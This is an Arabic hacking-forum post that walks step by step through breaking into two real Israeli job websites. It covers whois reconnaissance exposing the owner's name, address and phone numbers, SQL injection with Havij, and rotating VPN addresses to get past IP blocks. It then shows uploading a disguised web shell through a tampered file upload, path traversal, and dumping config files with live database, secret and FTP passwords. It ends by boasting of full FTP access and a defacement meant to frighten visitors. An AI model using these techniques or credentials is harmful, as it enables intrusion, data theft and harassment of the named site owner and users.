:: vBspiders Professional Network :: - للعناكب :استهذاف السيرفرات الخاصة و تخطي الحماية و الدعس و التطبيق على smarteq.co.il

موضوعي التاني بعد الغياب الطويل

خلينا نبلش ونقول

السلام عليكم وكيف الأحوال
بالموضوع السابق ذكرت سبب الغياب

وخلينا بالموضوع

الموضوع مهم ركز معي

ومن العنوان واضح شو الموضوع

يله نبلش عبركت الله

اولا نبدا بالدخول الى موقع who.is مثلا لجمع المعلومات

http://store3.up-00.com/Nov12/IGK55469.jpg

كود PHP:

   query:        smartjob.co.il 

reg-****:     smartjob 
domain:       smartjob.co.il 

descr:        Shachar Bialick 
descr:        Haetzel St.12 
descr:        Ariel 
descr:        44837 
descr:        Israel 
phone:        +972 3 5103051 
fax-no:       +972 3 7250210 
e-mail:       Shachar AT Techlocks.com 
admin-c:      LD-SB11242-IL 
tech-c:       LD-SB11242-IL 
zone-c:       LD-SB11242-IL 
nserver:      ns1.virtualbox.co.il 
nserver:      ns2.virtualbox.co.il 
validity:     20-07-2014 
status:       Transfer Locked 
changed:      domain-registrar AT isoc.org.il 20100720 (Assigned) 
changed:      domain-registrar AT isoc.org.il 20101003 (Changed) 
changed:      domain-registrar AT isoc.org.il 20110726 (Changed) 
changed:      domain-registrar AT isoc.org.il 20110726 (Changed) 

person:       Shachar Bialick 
address:      Haetzel St.12 
address:      Ariel 
address:      44837 
address:      Israel 
phone:        +972 52 8000004 
fax-no:       +972 3 7624553 
e-mail:       shachar AT internrate.co.il 
nic-hdl:      LD-SB11242-IL 
changed:      Managing Registrar 20070509 
changed:      Managing Registrar 20101003 

registrar ****: LiveDns Ltd 
registrar info: http://domains.livedns.co.il 

% Rights to the data above are restricted by copyrigh

نسحب الايبي و نروح على Bing

http://store3.up-00.com/Nov12/1ra55469.jpg

الموقع سكربت خاص ..... نجرب نتفحص الموقع و نبحث عن متفيرات لعل نحقنها او نبحث عن ثغرات النكلود مثلا

كود PHP:

   http://www.smartjob.co.il/content.php?id=2 

www.smartjob.co.il/search.php?pos_type_side_search=3

نضعهم في الهافينج

ملاحضة = معظم السكربتات الخاصة مصابة

كود PHP:

   License is valid 
Analyzing http://www.smartjob.co.il/search.php?pos_type_side_search=3 
Host IP: 62.219.17.248 
*** Server: Microsoft-IIS/7.5 
Powered-by: PHP/5.2.17 
Powered-by: ASP.NET

يا سلام تم الحقن و استخرجنا معلومات الادمينز .

http://store3.up-00.com/Nov12/CKR55469.jpg

تعالو نبحث عن لوحة التحكم ...

نبحث عن اللوحة نلاقي مكانين

الاول

كود PHP:

   https://www.smartjob.co.il/login.php

نجرب ندخل بيه الى احد الباسوردات ... يرفض الدخول

نشوف الثانية

كود PHP:

   http://www.smartjob.co.il/admin/

http://store3.up-00.com/Nov12/eA455469.jpg

اووبس

ماني فهمان ولا اي شي ........ هي لوحة تحكم جوملا لما يكون الموقع مسكر مثلا .

نجرب

كود PHP:

    http://www.smartjob.co.il/admin/administrator

http://store3.up-00.com/Nov12/1iQ55842.jpg

نجرب ندخل بالبيانات المسحوبة من قبل .... لم ننجح البيانات خاطئة

طيب فين لوحة التحكم ؟ ما فيه ؟ يعني شغلنا كله طار

ااااه كم هي صعبم المواقع الخاصة .....

استنى بقى ... في الموقع فيه مكان للتسجل .... ليه ما نسجل و ندخل

لان التسجيل ياخذك لمنطقة خاصة نوعاا ما ... ممكن فيها ثغرة ... او لوحة

بعد التسجيل احنا في اللوحة الخاصة بالمسجلين ..... بس استنى هو شو في ؟

http://store3.up-00.com/Nov12/sQa55842.jpg

الدنيا ملخبطة ؟ ؟؟ ...... انا على موقع ثاني مو الموقع الاول ؟ ؟؟

كود PHP:

   https://www.smarteq.co.il/he-il/applicants/7647966b59/status

انا على ال job و شو جاب teq §§§

اقولكم ..... لما تكون مواقع خاصة ... فانه احتمال كبير ان يستخدمون نفس القاعدة البيانات ... لهذا لما حقنا السكربت الاول smartjob سحبنا معلومات من قاعدة السربت الثاني

smartteq ...لانه ببساطة نفس قاعدة البيانات

و هنا حلينا مشكلة بعض الشباب انه يحقن موقع و مايلقى اللوحة << برايفت و ماتغلى عليكم .

طيب الان بديهي انه اللوحة راح تكون في موقع smarteq.co.il

http://store3.up-00.com/Nov12/B7b55842.jpg

نفحص الموقع ببرنامج acuntix

http://store3.up-00.com/Nov12/1HU55842.jpg

و نطلع اللوحة ..... بس استنى

الموقع لما يبدا الفحص يعطيك بلوك للايبي ..... طيب كيف نفحص ؟

نفحص بالبرنامج نفسه بس مع بعض الشروط

الاول يكون عندنا vpn و نفحص الا به عشان لما يعمل بلوك نعيد نتصل و بالتالي ايبي جديد
الثاني هو و نطلع اللوحة ..... بس استنى

الموقع لما يبدا الفحص يعطيك بلوك للايبي ..... طيب كيف نفحص ؟

نفحص بالبرنامج نفسه بس مع بعض الشروط

الاول يكون عندنا vpn و نفحص الا به عشان لما يعمل بلوك نعيد نتصل و بالتالي ايبي جديد
الثاني هو

http://store3.up-00.com/Nov12/Ajv56331.jpg

شايفين في الصورة في اليمين اعلى .... نجد pause و resume ... ههه يعني

كلما يعطينا بلوك نروح للبرنامج و نعمل pause و نروح لل Vpn و نغير اليبي ثم نعود للبرنامج و نعمل resume

و نكمل الفحص حتى نجد اللوحة هذه

كود PHP:

   https://www.smarteq.co.il/he-il/site/adminlogin?login=true

http://store3.up-00.com/Nov12/9px56331.jpg

نجرب ندخل بالبيانات اللي سحبناها فوق بال الهافينج ..... و النتيجة مبرررررررررروك اللوحة

http://store3.up-00.com/Nov12/16K56331.jpg

بس فيه مشكلة شباب ... هو اللغة هي حدي فهمها ؟

هههه حاليا ما لازم نفهمها .. طريقة بسيطة نفس اللي في الصورة

http://store3.up-00.com/Nov12/n7956331.jpg

نممر سهم الفارة و نقرا المسار او اللينك .... و نفهم معناه

و نجرب هنا

كود PHP:

   https://www.smarteq.co.il/he-il/admin/settings/account

http://store3.up-00.com/Nov12/zJ956551.jpg

ياسلام ... نجرب نرفع شل مشفر ...... مشان ما يمسكوه الانتي فيروس

application/octet-streamno good

بفففففف ... ماينفعش نرفع ملف php

استنى بقى .... نجرب tamper data

نحول صيغة الشل على جهازي من a.php الى a.jpg

ثم

http://store3.up-00.com/Nov12/aG856551.jpg

يا سلام تم الرفع

بس مسار الشل وين ؟؟؟

نجرب نشوف سورس الصفحة

جمييييييييييييييييييل جدااا ... هذا مسار الشل

http://store3.up-00.com/Nov12/Tjp56551.jpg

كود PHP:

   https://www.smarteq.co.il/lib/incs/classes/thumbnail.php?image=6002_a.php&p=26&core=true

ندخل من المنتصفح بففففففففففففففف ... الشل ما شتغل

شو نعمل يا جماعه ؟؟؟

استنى لحظه هو ملف thumbnail.php هو اللي في الرابط ... و يحاول يفتح لنا الشل على انه صورة .... لذلك هدا الخطا

طيب الملفات اترفعت وين ؟

لاحض الرابط فوق و الموقع .... احتمال ثغرة انكلود

نجرب هيك

كود PHP:

   https://www.smarteq.co.il/lib/incs/classes/thumbnail.php?image=../../

ضهر خطا

جميييل

كود PHP:

    ../../_uploads/images/../

يعني من مجلد classes نرجع مجلدين ... و نصبح في lib و منه نجد مجلدي uploads و images يعني الشل يكون هنا ..

كود PHP:

    https://www.smarteq.co.il/lib/_uploads/images/6002_a.php

http://store3.up-00.com/Nov12/OBB56551.jpg

نجرب .... ياااااااااااااااااااااااااااااسلام ... هذا الشل

*****************************

الان رفعنا الشل ... طيب شو نعمل ؟ ممكن نثبت انفسنا على السيرفر جيداا
او نبحث عن ملفات حساسة

اول الملفات هي ملفات الكونفيغات

و انا اريد قراءة كونفيغ جوملا اللي لقيناه من قيبل

نجرب نبحث من الشل .... انا صراحة ضعيف جدا في سرفرات الوندوز

بس فيه طريقتي الفاشلة هذه

لا حظو المسارهنا

كود PHP:

   c:DomainsShaharBsmarteq.co.ilwwwrootlib_uploads

يعني من المفروض مسار الكونفيغ يكون

كود PHP:

   c:DomainsShaharBsmartjob.co.ilwwwrootadminconfiguration.php

و هذا الكونفيغ

كود PHP:

  
 <?php 
class JConfig { 
    public $offline = '1'; 
    public $offline_message =  
    public $site**** = 'SmartJOB'; 
    public $editor = 'tinymce'; 
    public $list_limit = '20'; 
    public $access = '1'; 
    public $debug = '0'; 
    public $debug_lang = '0'; 
    public $dbtype = 'mysql'; 
    public $host = 'localhost'; 
    public $user = 'getsmar_cv123'; 
    public $password = 'H5p60v9OfT9n'; 
    public $db = 'getsmar_smartjob'; 
    public $dbprefix = 'jos_'; 
    public $live_site = ''; 
    public $secret = '1phLFwWlgWcTugFj'; 
    public $gzip = '0'; 
    public $error_reporting = '-1'; 
    public $helpurl = 'http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help{major}{minor}:{keyref}'; 
    public $ftp_host = '127.0.0.1'; 
    public $ftp_port = '21'; 
    public $ftp_user = ''; 
    public $ftp_pass = ''; 
    public $ftp_root = ''; 
    public $ftp_enable = '0'; 
    public $offset = 'UTC'; 
    public $offset_user = 'UTC'; 
    public $mailer = 'mail'; 
    public $mailfrom = 'admin@smartjob.co.il'; 
    public $from**** = 'SmartJOB'; 
    public $sendmail = '/usr/sbin/sendmail'; 
    public $smtpauth = '0'; 
    public $smtpuser = '×،×™×،×‍×گ'; 
    public $smtppass = '****l100'; 
    public $smtphost = 'localhost'; 
    public $smtpsecure = 'none'; 
    public $smtpport = '25'; 
    public $caching = '0'; 
    public $cache_handler = 'file'; 
    public $cachetime = '15'; 
    public $****Desc = ''; 
    public $****Keys = ''; 
    public $****Title = '1'; 
    public $****Author = '1'; 
    public $sef = '1'; 
    public $sef_rewrite = '0'; 
    public $sef_suffix = '0'; 
    public $unicodeslugs = '0'; 
    public $feed_limit = '10'; 
    public $log_path = 'C:\\Domains\\ShaharB\\smartjob.co.il\\wwwroot\\admin\\logs'; 
    public $tmp_path = 'C:\\Domains\\ShaharB\\smartjob.co.il\\wwwroot\\admin\\tmp'; 
    public $lifetime = '15'; 
    public $session_handler = 'database'; 
    public $****Rights = ''; 
    public $site****_pagetitles = '0'; 
    public $force_ssl = '0'; 
    public $feed_email = 'author'; 
    public $******_domain = ''; 
    public $******_path = ''; 
}

طبعاا شباب دام انها تقريبا قاعدة واحدة ..... يعني اي معلومة راح تكون حساسة جدااااااااااا
و منها

هذا كونيغ ثاني لقيته

كود PHP:

   C:DomainsShaharBsmartjob.co.ilwwwrootconfiguration.php

فيه التالي

كود PHP:

    public $ftp_host = '62.219.17.236'; 
    public $ftp_port = '21'; 
    public $ftp_user = 'OrZilca'; 
    public $ftp_pass = 'WorkHard50'; 
    public $ftp_root = 'smartjob.co.il/wwwroot/'; 
    public $ftp_enable = '1';

نجرب ندخل ftp

و النتيجة full access على جميع مواقعه

http://store3.up-00.com/Nov12/2lN57156.jpg

طيب الان الاندكس ..... كلام و صور .... و بعد شوي صاحب الموقع يعدله و خلص

جميلة صح ؟

لا

نهاجم الموقع + نهاجم الزوار ...... نرعبهم ههههههههههه

فيه فلاش بنت كانها شبح وتبلش بالصراخ ..... صراحة انا اعلق في الاندكس و لا اشغله من الرعب ههههههههه

عشان تصبح remote kill index ههههههههههههههههههههههه

نشالله كون توفقت بالشرح

وشكرا لا تنسونا من الدعاء

وفك اسر المعتقلين في سوريا

وتحسين الحال

امين يا الله